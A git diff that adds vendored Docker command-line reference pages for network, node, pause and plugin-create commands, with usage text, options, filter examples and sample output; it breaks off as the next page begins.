disconnect](network_disconnect.md) +* [network ls](network_ls.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md new file mode 100644 index 0000000000..42e976a500 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md @@ -0,0 +1,43 @@ +--- +title: "network disconnect" +description: "The network disconnect command description and usage" +keywords: "network, disconnect, user-defined" +--- + + + +# network disconnect + +```markdown +Usage: docker network disconnect [OPTIONS] NETWORK CONTAINER + +Disconnect a container from a network + +Options: + -f, --force Force the container to disconnect from a network + --help Print usage +``` + +Disconnects a container from a network. The container must be running to disconnect it from the network. + +```bash + $ docker network disconnect multi-host-network container1 +``` + + +## Related information + +* [network inspect](network_inspect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network ls](network_ls.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md new file mode 100644 index 0000000000..bc0005e38e --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md @@ -0,0 +1,192 @@ +--- +title: "network inspect" +description: "The network inspect command description and usage" +keywords: "network, inspect, user-defined" +--- + + + +# network inspect + +```markdown +Usage: docker network inspect [OPTIONS] NETWORK [NETWORK...] + +Display detailed information on one or more networks + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network: + +```bash +$ sudo docker run -itd --name=container1 busybox +f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27 + +$ sudo docker run -itd --name=container2 busybox +bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727 +``` + +The `network inspect` command shows the containers, by id, in its +results. For networks backed by multi-host network driver, such as Overlay, +this command also shows the container endpoints in other hosts in the +cluster. These endpoints are represented as "ep-{endpoint-id}" in the output. +However, for swarm-scoped networks, only the endpoints that are local to the +node are shown. + +You can specify an alternate format to execute a given +template for each result. Go's +[text/template](http://golang.org/pkg/text/template/) package describes all the +details of the format. + +```bash +$ sudo docker network inspect bridge +[ + { + "Name": "bridge", + "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f", + "Created": "2016-10-19T04:33:30.360899459Z", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.42.1/16", + "Gateway": "172.17.42.1" + } + ] + }, + "Internal": false, + "Containers": { + "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": { + "Name": "container2", + "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + }, + "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": { + "Name": "container1", + "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad", + "MacAddress": "02:42:ac:11:00:01", + "IPv4Address": "172.17.0.1/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": {} + } +] +``` + +Returns the information about the user-defined network: + +```bash +$ docker network create simple-network +69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a +$ docker network inspect simple-network +[ + { + "Name": "simple-network", + "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a", + "Created": "2016-10-19T04:33:30.360899459Z", + "Scope": "local", + "Driver": "bridge", + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.22.0.0/16", + "Gateway": "172.22.0.1" + } + ] + }, + "Containers": {}, + "Options": {}, + "Labels": {} + } +] +``` + +For swarm mode overlay networks `network inspect` also shows the IP address and node name +of the peers. Peers are the nodes in the swarm cluster which have at least one task attached +to the network. Node name is of the format `-`. + +```bash +$ docker network inspect ingress +[ + { + "Name": "ingress", + "Id": "j0izitrut30h975vk4m1u5kk3", + "Created": "2016-11-08T06:49:59.803387552Z", + "Scope": "swarm", + "Driver": "overlay", + "EnableIPv6": false, + "IPAM": { + "Driver": "default", + "Options": null, + "Config": [ + { + "Subnet": "10.255.0.0/16", + "Gateway": "10.255.0.1" + } + ] + }, + "Internal": false, + "Attachable": false, + "Containers": { + "ingress-sbox": { + "Name": "ingress-endpoint", + "EndpointID": "40e002d27b7e5d75f60bc72199d8cae3344e1896abec5eddae9743755fe09115", + "MacAddress": "02:42:0a:ff:00:03", + "IPv4Address": "10.255.0.3/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.driver.overlay.vxlanid_list": "256" + }, + "Labels": {}, + "Peers": [ + { + "Name": "net-1-1d22adfe4d5c", + "IP": "192.168.33.11" + }, + { + "Name": "net-2-d55d838b34af", + "IP": "192.168.33.12" + }, + { + "Name": "net-3-8473f8140bd9", + "IP": "192.168.33.13" + } + ] + } +] +``` + +## Related information + +* [network disconnect ](network_disconnect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network ls](network_ls.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md new file mode 100644 index 0000000000..a4f671d569 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md @@ -0,0 +1,218 @@ +--- +title: "network ls" +description: "The network ls command description and usage" +keywords: "network, list, user-defined" +--- + + + +# docker network ls + +```markdown +Usage: docker network ls [OPTIONS] + +List networks + +Aliases: + ls, list + +Options: + -f, --filter filter Provide filter values (e.g. 'driver=bridge') + --format string Pretty-print networks using a Go template + --help Print usage + --no-trunc Do not truncate the output + -q, --quiet Only display network IDs +``` + +Lists all the networks the Engine `daemon` knows about. This includes the +networks that span across multiple hosts in a cluster, for example: + +```bash +$ sudo docker network ls +NETWORK ID NAME DRIVER SCOPE +7fca4eb8c647 bridge bridge local +9f904ee27bf5 none null local +cf03ee007fb4 host host local +78b03ee04fc4 multi-host overlay swarm +``` + +Use the `--no-trunc` option to display the full network id: + +```bash +$ docker network ls --no-trunc +NETWORK ID NAME DRIVER SCOPE +18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3 none null local +c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47 host host local +7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185 bridge bridge local +95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd foo bridge local +63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 dev bridge local +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. For example, +`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks. + +The currently supported filters are: + +* driver +* id (network's id) +* label (`label=` or `label==`) +* name (network's name) +* type (custom|builtin) + +#### Driver + +The `driver` filter matches networks based on their driver. + +The following example matches networks with the `bridge` driver: + +```bash +$ docker network ls --filter driver=bridge +NETWORK ID NAME DRIVER SCOPE +db9db329f835 test1 bridge local +f6e212da9dfd test2 bridge local +``` + +#### ID + +The `id` filter matches on all or part of a network's ID. + +The following filter matches all networks with an ID containing the +`63d1ff1f77b0...` string. + +```bash +$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 +NETWORK ID NAME DRIVER SCOPE +63d1ff1f77b0 dev bridge local +``` + +You can also filter for a substring in an ID as this shows: + +```bash +$ docker network ls --filter id=95e74588f40d +NETWORK ID NAME DRIVER SCOPE +95e74588f40d foo bridge local + +$ docker network ls --filter id=95e +NETWORK ID NAME DRIVER SCOPE +95e74588f40d foo bridge local +``` + +#### Label + +The `label` filter matches networks based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches networks with the `usage` label regardless of its value. + +```bash +$ docker network ls -f "label=usage" +NETWORK ID NAME DRIVER SCOPE +db9db329f835 test1 bridge local +f6e212da9dfd test2 bridge local +``` + +The following filter matches networks with the `usage` label with the `prod` value. + +```bash +$ docker network ls -f "label=usage=prod" +NETWORK ID NAME DRIVER SCOPE +f6e212da9dfd test2 bridge local +``` + +#### Name + +The `name` filter matches on all or part of a network's name. + +The following filter matches all networks with a name containing the `foobar` string. + +```bash +$ docker network ls --filter name=foobar +NETWORK ID NAME DRIVER SCOPE +06e7eef0a170 foobar bridge local +``` + +You can also filter for a substring in a name as this shows: + +```bash +$ docker network ls --filter name=foo +NETWORK ID NAME DRIVER SCOPE +95e74588f40d foo bridge local +06e7eef0a170 foobar bridge local +``` + +#### Type + +The `type` filter supports two values; `builtin` displays predefined networks +(`bridge`, `none`, `host`), whereas `custom` displays user defined networks. + +The following filter matches all user defined networks: + +```bash +$ docker network ls --filter type=custom +NETWORK ID NAME DRIVER SCOPE +95e74588f40d foo bridge local +63d1ff1f77b0 dev bridge local +``` + +By having this flag it allows for batch cleanup. For example, use this filter +to delete all user defined networks: + +```bash +$ docker network rm `docker network ls --filter type=custom -q` +``` + +A warning will be issued when trying to remove a network that has containers +attached. + +## Formatting + +The formatting options (`--format`) pretty-prints networks output +using a Go template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +------------|------------------------------------------------------------------------------------------ +`.ID` | Network ID +`.Name` | Network name +`.Driver` | Network driver +`.Scope` | Network scope (local, global) +`.IPv6` | Whether IPv6 is enabled on the network or not. +`.Internal` | Whether the network is internal or not. +`.Labels` | All labels assigned to the network. +`.Label` | Value of a specific label for this network. For example `{{.Label "project.version"}}` + +When using the `--format` option, the `network ls` command will either +output the data exactly as the template declares or, when using the +`table` directive, includes column headers as well. + +The following example uses a template without headers and outputs the +`ID` and `Driver` entries separated by a colon for all networks: + +```bash +$ docker network ls --format "{{.ID}}: {{.Driver}}" +afaaab448eb2: bridge +d1584f8dc718: host +391df270dc66: null +``` + +## Related information + +* [network disconnect ](network_disconnect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network inspect](network_inspect.md) +* [network rm](network_rm.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md new file mode 100644 index 0000000000..5b65465600 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md @@ -0,0 +1,45 @@ +--- +title: "network prune" +description: "Remove unused networks" +keywords: "network, prune, delete" +--- + +# network prune + +```markdown +Usage: docker network prune [OPTIONS] + +Remove all unused networks + +Options: + -f, --force Do not prompt for confirmation + --help Print usage +``` + +Remove all unused networks. Unused networks are those which are not referenced by any containers. + +Example output: + +```bash +$ docker network prune +WARNING! This will remove all networks not used by at least one container. +Are you sure you want to continue? [y/N] y +Deleted Networks: +n1 +n2 +``` + +## Related information + +* [network disconnect ](network_disconnect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network ls](network_ls.md) +* [network inspect](network_inspect.md) +* [network rm](network_rm.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) +* [system df](system_df.md) +* [container prune](container_prune.md) +* [image prune](image_prune.md) +* [volume prune](volume_prune.md) +* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md new file mode 100644 index 0000000000..f06b4c002d --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md @@ -0,0 +1,59 @@ +--- +title: "network rm" +description: "the network rm command description and usage" +keywords: "network, rm, user-defined" +--- + + + +# network rm + +```markdown +Usage: docker network rm NETWORK [NETWORK...] + +Remove one or more networks + +Aliases: + rm, remove + +Options: + --help Print usage +``` + +Removes one or more networks by name or identifier. To remove a network, +you must first disconnect any containers connected to it. +To remove the network named 'my-network': + +```bash + $ docker network rm my-network +``` + +To delete multiple networks in a single `docker network rm` command, provide +multiple network names or ids. The following example deletes a network with id +`3695c422697f` and a network named `my-network`: + +```bash + $ docker network rm 3695c422697f my-network +``` + +When you specify multiple networks, the command attempts to delete each in turn. +If the deletion of one network fails, the command continues to the next on the +list and tries to delete that. The command reports success or failure for each +deletion. + +## Related information + +* [network disconnect ](network_disconnect.md) +* [network connect](network_connect.md) +* [network create](network_create.md) +* [network ls](network_ls.md) +* [network inspect](network_inspect.md) +* [network prune](network_prune.md) +* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md new file mode 100644 index 0000000000..9a81bb9c04 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md @@ -0,0 +1,42 @@ +--- +title: "node demote" +description: "The node demote command description and usage" +keywords: "node, demote" +--- + + + +# node demote + +```markdown +Usage: docker node demote NODE [NODE...] + +Demote one or more nodes from manager in the swarm + +Options: + --help Print usage + +``` + +Demotes an existing manager so that it is no longer a manager. This command targets a docker engine that is a manager in the swarm. + + +```bash +$ docker node demote +``` + +## Related information + +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md new file mode 100644 index 0000000000..fac688fe40 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md @@ -0,0 +1,137 @@ +--- +title: "node inspect" +description: "The node inspect command description and usage" +keywords: "node, inspect" +--- + + + +# node inspect + +```markdown +Usage: docker node inspect [OPTIONS] self|NODE [NODE...] + +Display detailed information on one or more nodes + +Options: + -f, --format string Format the output using the given Go template + --help Print usage + --pretty Print the information in a human friendly format. +``` + +Returns information about a node. By default, this command renders all results +in a JSON array. You can specify an alternate format to execute a +given template for each result. Go's +[text/template](http://golang.org/pkg/text/template/) package describes all the +details of the format. + +Example output: + + $ docker node inspect swarm-manager + [ + { + "ID": "e216jshn25ckzbvmwlnh5jr3g", + "Version": { + "Index": 10 + }, + "CreatedAt": "2016-06-16T22:52:44.9910662Z", + "UpdatedAt": "2016-06-16T22:52:45.230878043Z", + "Spec": { + "Role": "manager", + "Availability": "active" + }, + "Description": { + "Hostname": "swarm-manager", + "Platform": { + "Architecture": "x86_64", + "OS": "linux" + }, + "Resources": { + "NanoCPUs": 1000000000, + "MemoryBytes": 1039843328 + }, + "Engine": { + "EngineVersion": "1.12.0", + "Plugins": [ + { + "Type": "Volume", + "Name": "local" + }, + { + "Type": "Network", + "Name": "overlay" + }, + { + "Type": "Network", + "Name": "null" + }, + { + "Type": "Network", + "Name": "host" + }, + { + "Type": "Network", + "Name": "bridge" + }, + { + "Type": "Network", + "Name": "overlay" + } + ] + } + }, + "Status": { + "State": "ready", + "Addr": "168.0.32.137" + }, + "ManagerStatus": { + "Leader": true, + "Reachability": "reachable", + "Addr": "168.0.32.137:2377" + } + } + ] + + {% raw %} + $ docker node inspect --format '{{ .ManagerStatus.Leader }}' self + false + {% endraw %} + + $ docker node inspect --pretty self + ID: e216jshn25ckzbvmwlnh5jr3g + Hostname: swarm-manager + Joined at: 2016-06-16 22:52:44.9910662 +0000 utc + Status: + State: Ready + Availability: Active + Address: 172.17.0.2 + Manager Status: + Address: 172.17.0.2:2377 + Raft Status: Reachable + Leader: Yes + Platform: + Operating System: linux + Architecture: x86_64 + Resources: + CPUs: 4 + Memory: 7.704 GiB + Plugins: + Network: overlay, bridge, null, host, overlay + Volume: local + Engine Version: 1.12.0 + +## Related information + +* [node demote](node_demote.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md new file mode 100644 index 0000000000..5f61713c2e --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md @@ -0,0 +1,130 @@ +--- +title: "node ls" +description: "The node ls command description and usage" +keywords: "node, list" +--- + + + +# node ls + +```markdown +Usage: docker node ls [OPTIONS] + +List nodes in the swarm + +Aliases: + ls, list + +Options: + -f, --filter value Filter output based on conditions provided + --help Print usage + -q, --quiet Only display IDs +``` + +Lists all the nodes that the Docker Swarm manager knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. + +Example output: + +```bash +$ docker node ls + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active +38ciaotwjuritcdtn9npbnkuz swarm-worker1 Ready Active +e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* [id](node_ls.md#id) +* [label](node_ls.md#label) +* [membership](node_ls.md#membership) +* [name](node_ls.md#name) +* [role](node_ls.md#role) + +#### ID + +The `id` filter matches all or part of a node's id. + +```bash +$ docker node ls -f id=1 + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active +``` + +#### Label + +The `label` filter matches nodes based on engine labels and on the presence of a `label` alone or a `label` and a value. Node labels are currently not used for filtering. + +The following filter matches nodes with the `foo` label regardless of its value. + +```bash +$ docker node ls -f "label=foo" + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active +``` + +#### Membership + +The `membership` filter matches nodes based on the presence of a `membership` and a value +`accepted` or `pending`. + +The following filter matches nodes with the `membership` of `accepted`. + +```bash +$ docker node ls -f "membership=accepted" + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active +38ciaotwjuritcdtn9npbnkuz swarm-worker1 Ready Active +``` + +#### Name + +The `name` filter matches on all or part of a node hostname. + +The following filter matches the nodes with a name equal to `swarm-master` string. + +```bash +$ docker node ls -f name=swarm-manager1 + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader +``` + +#### Role + +The `role` filter matches nodes based on the presence of a `role` and a value `worker` or `manager`. + +The following filter matches nodes with the `manager` role. + +```bash +$ docker node ls -f "role=manager" + +ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS +e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader +``` + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md new file mode 100644 index 0000000000..92092a8935 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md @@ -0,0 +1,41 @@ +--- +title: "node promote" +description: "The node promote command description and usage" +keywords: "node, promote" +--- + + + +# node promote + +```markdown +Usage: docker node promote NODE [NODE...] + +Promote one or more nodes to manager in the swarm + +Options: + --help Print usage +``` + +Promotes a node to manager. This command targets a docker engine that is a manager in the swarm. + + +```bash +$ docker node promote +``` + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md new file mode 100644 index 0000000000..7f07c5ea64 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md @@ -0,0 +1,107 @@ +--- +title: "node ps" +description: "The node ps command description and usage" +keywords: node, tasks, ps +aliases: ["/engine/reference/commandline/node_tasks/"] +--- + + + +# node ps + +```markdown +Usage: docker node ps [OPTIONS] [NODE...] + +List tasks running on one or more nodes, defaults to current node. + +Options: + -f, --filter value Filter output based on conditions provided + --help Print usage + --no-resolve Do not map IDs to Names + --no-trunc Do not truncate output +``` + +Lists all the tasks on a Node that Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. + +Example output: + + $ docker node ps swarm-manager1 + NAME IMAGE NODE DESIRED STATE CURRENT STATE + redis.1.7q92v0nr1hcgts2amcjyqg3pq redis:3.0.6 swarm-manager1 Running Running 5 hours + redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 29 seconds + redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds + redis.9.dkkual96p4bb3s6b10r7coxxt redis:3.0.6 swarm-manager1 Running Running 5 seconds + redis.10.0tgctg8h8cech4w0k0gwrmr23 redis:3.0.6 swarm-manager1 Running Running 5 seconds + + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* [name](#name) +* [id](#id) +* [label](#label) +* [desired-state](#desired-state) + +#### name + +The `name` filter matches on all or part of a task's name. + +The following filter matches all tasks with a name containing the `redis` string. + + $ docker node ps -f name=redis swarm-manager1 + NAME IMAGE NODE DESIRED STATE CURRENT STATE + redis.1.7q92v0nr1hcgts2amcjyqg3pq redis:3.0.6 swarm-manager1 Running Running 5 hours + redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 29 seconds + redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds + redis.9.dkkual96p4bb3s6b10r7coxxt redis:3.0.6 swarm-manager1 Running Running 5 seconds + redis.10.0tgctg8h8cech4w0k0gwrmr23 redis:3.0.6 swarm-manager1 Running Running 5 seconds + + +#### id + +The `id` filter matches a task's id. + + $ docker node ps -f id=bg8c07zzg87di2mufeq51a2qp swarm-manager1 + NAME IMAGE NODE DESIRED STATE CURRENT STATE + redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds + + +#### label + +The `label` filter matches tasks based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches tasks with the `usage` label regardless of its value. + +```bash +$ docker node ps -f "label=usage" +NAME IMAGE NODE DESIRED STATE CURRENT STATE +redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 10 minutes +redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 9 minutes +``` + + +#### desired-state + +The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`. + + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node rm](node_rm.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md new file mode 100644 index 0000000000..b245d636cc --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md @@ -0,0 +1,73 @@ +--- +title: "node rm" +description: "The node rm command description and usage" +keywords: "node, remove" +--- + + + +# node rm + +```markdown +Usage: docker node rm [OPTIONS] NODE [NODE...] + +Remove one or more nodes from the swarm + +Aliases: + rm, remove + +Options: + -f, --force Force remove a node from the swarm + --help Print usage +``` + +When run from a manager node, removes the specified nodes from a swarm. + + +Example output: + +```nohighlight +$ docker node rm swarm-node-02 + +Node swarm-node-02 removed from swarm +``` + +Removes the specified nodes from the swarm, but only if the nodes are in the +down state. If you attempt to remove an active node you will receive an error: + +```nohighlight +$ docker node rm swarm-node-03 + +Error response from daemon: rpc error: code = 9 desc = node swarm-node-03 is not +down and can't be removed +``` + +If you lose access to a worker node or need to shut it down because it has been +compromised or is not behaving as expected, you can use the `--force` option. +This may cause transient errors or interruptions, depending on the type of task +being run on the node. + +```nohighlight +$ docker node rm --force swarm-node-03 + +Node swarm-node-03 removed from swarm +``` + +A manager node must be demoted to a worker node (using `docker node demote`) +before you can remove it from the swarm. + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md new file mode 100644 index 0000000000..aa65d0309e --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md @@ -0,0 +1,71 @@ +--- +title: "node update" +description: "The node update command description and usage" +keywords: "resources, update, dynamically" +--- + + + +## update + +```markdown +Usage: docker node update [OPTIONS] NODE + +Update a node + +Options: + --availability string Availability of the node (active/pause/drain) + --help Print usage + --label-add value Add or update a node label (key=value) (default []) + --label-rm value Remove a node label if exists (default []) + --role string Role of the node (worker/manager) +``` + +### Add label metadata to a node + +Add metadata to a swarm node using node labels. You can specify a node label as +a key with an empty value: + +``` bash +$ docker node update --label-add foo worker1 +``` + +To add multiple labels to a node, pass the `--label-add` flag for each label: + +``` bash +$ docker node update --label-add foo --label-add bar worker1 +``` + +When you [create a service](service_create.md), +you can use node labels as a constraint. A constraint limits the nodes where the +scheduler deploys tasks for a service. + +For example, to add a `type` label to identify nodes where the scheduler should +deploy message queue service tasks: + +``` bash +$ docker node update --label-add type=queue worker1 +``` + +The labels you set for nodes using `docker node update` apply only to the node +entity within the swarm. Do not confuse them with the docker daemon labels for +[dockerd](https://docs.docker.com/engine/userguide/labels-custom-metadata/#daemon-labels). + +For more information about labels, refer to [apply custom +metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). + +## Related information + +* [node demote](node_demote.md) +* [node inspect](node_inspect.md) +* [node ls](node_ls.md) +* [node promote](node_promote.md) +* [node ps](node_ps.md) +* [node rm](node_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md new file mode 100644 index 0000000000..e2dd800d5f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md @@ -0,0 +1,40 @@ +--- +title: "pause" +description: "The pause command description and usage" +keywords: "cgroups, container, suspend, SIGSTOP" +--- + + + +# pause + +```markdown +Usage: docker pause CONTAINER [CONTAINER...] + +Pause all processes within one or more containers + +Options: + --help Print usage +``` + +The `docker pause` command suspends all processes in the specified containers. +On Linux, this uses the cgroups freezer. Traditionally, when suspending a process +the `SIGSTOP` signal is used, which is observable by the process being suspended. +With the cgroups freezer the process is unaware, and unable to capture, +that it is being suspended, and subsequently resumed. On Windows, only Hyper-V +containers can be paused. + +See the +[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt) +for further details. + +## Related information + +* [unpause](unpause.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md new file mode 100644 index 0000000000..9d4e99e56a --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md @@ -0,0 +1,60 @@ +--- +title: "plugin create" +description: "the plugin create command description and usage" +keywords: "plugin, create" +--- + + + +# plugin create + +```markdown +Usage: docker plugin create [OPTIONS] PLUGIN PLUGIN-DATA-DIR + +Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory. + +Options: + --compress Compress the context using gzip + --help Print usage +``` + +Creates a plugin. Before creating the plugin, prepare the plugin's root filesystem as well as +[the config.json](../../extend/config.md) + + +The following example shows how to create a sample `plugin`. + +```bash + +$ ls -ls /home/pluginDir + +4 -rw-r--r-- 1 root root 431 Nov 7 01:40 config.json +0 drwxr-xr-x 19 root root 420 Nov 7 01:40 rootfs + +$ docker plugin create plugin /home/pluginDir +plugin + +NAME TAG DESCRIPTION ENABLED +plugin latest A sample plugin for Docker true +``` + +The plugin can subsequently be enabled for local use or pushed to the public registry. + +## Related information + +* [plugin disable](plugin_disable.md) +* [plugin enable](plugin_enable.md) +* [plugin inspect](plugin_inspect.md) +* [plugin install](plugin_install.md) +* [plugin ls](plugin_ls.md) +* [plugin push](plugin_push.md) +* [plugin rm](plugin_rm.md) +* [plugin set](plugin_set.md) +* [plugin upgrade](plugin_upgrade.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md new file mode 100644 index 